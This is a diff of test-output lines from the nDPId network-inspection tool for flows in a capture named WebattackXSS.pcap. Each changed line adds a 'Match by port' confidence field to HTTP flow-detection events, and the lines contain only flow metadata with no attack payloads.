-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499348028117,"flow_last_seen":1499348033910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35208,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499348028117,"flow_last_seen":1499348033910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35208,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499348028117,"flow_last_seen":1499348033910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35208,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348029395,"flow_last_seen":1499348034910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35222,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348029395,"flow_last_seen":1499348034910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35222,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348029395,"flow_last_seen":1499348034910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35222,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348030687,"flow_last_seen":1499348035910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35236,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348030687,"flow_last_seen":1499348035910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35236,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348030687,"flow_last_seen":1499348035910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35236,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499348033296,"flow_last_seen":1499348038910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35262,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499348033296,"flow_last_seen":1499348038910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35262,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499348033296,"flow_last_seen":1499348038910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35262,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348034569,"flow_last_seen":1499348039911,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35276,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348034569,"flow_last_seen":1499348039911,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35276,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348034569,"flow_last_seen":1499348039911,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35276,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348037175,"flow_last_seen":1499348042911,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35302,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348037175,"flow_last_seen":1499348042911,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35302,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348037175,"flow_last_seen":1499348042911,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35302,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348038438,"flow_last_seen":1499348043911,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35316,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348038438,"flow_last_seen":1499348043911,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35316,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348038438,"flow_last_seen":1499348043911,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35316,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348041088,"flow_last_seen":1499348046912,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35342,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348041088,"flow_last_seen":1499348046912,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35342,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348041088,"flow_last_seen":1499348046912,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35342,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348042384,"flow_last_seen":1499348047912,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35356,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348042384,"flow_last_seen":1499348047912,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35356,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348042384,"flow_last_seen":1499348047912,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35356,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348043670,"flow_last_seen":1499348048912,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35370,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348043670,"flow_last_seen":1499348048912,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35370,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348043670,"flow_last_seen":1499348048912,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35370,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348046262,"flow_last_seen":1499348051913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35396,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348046262,"flow_last_seen":1499348051913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35396,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348046262,"flow_last_seen":1499348051913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35396,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348047547,"flow_last_seen":1499348052913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35410,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348047547,"flow_last_seen":1499348052913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35410,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348047547,"flow_last_seen":1499348052913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35410,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348050079,"flow_last_seen":1499348055913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35436,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348050079,"flow_last_seen":1499348055913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35436,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348050079,"flow_last_seen":1499348055913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35436,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348051362,"flow_last_seen":1499348056913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35450,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348051362,"flow_last_seen":1499348056913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35450,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348051362,"flow_last_seen":1499348056913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35450,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348052641,"flow_last_seen":1499348057914,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35464,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348052641,"flow_last_seen":1499348057914,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35464,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348052641,"flow_last_seen":1499348057914,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35464,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
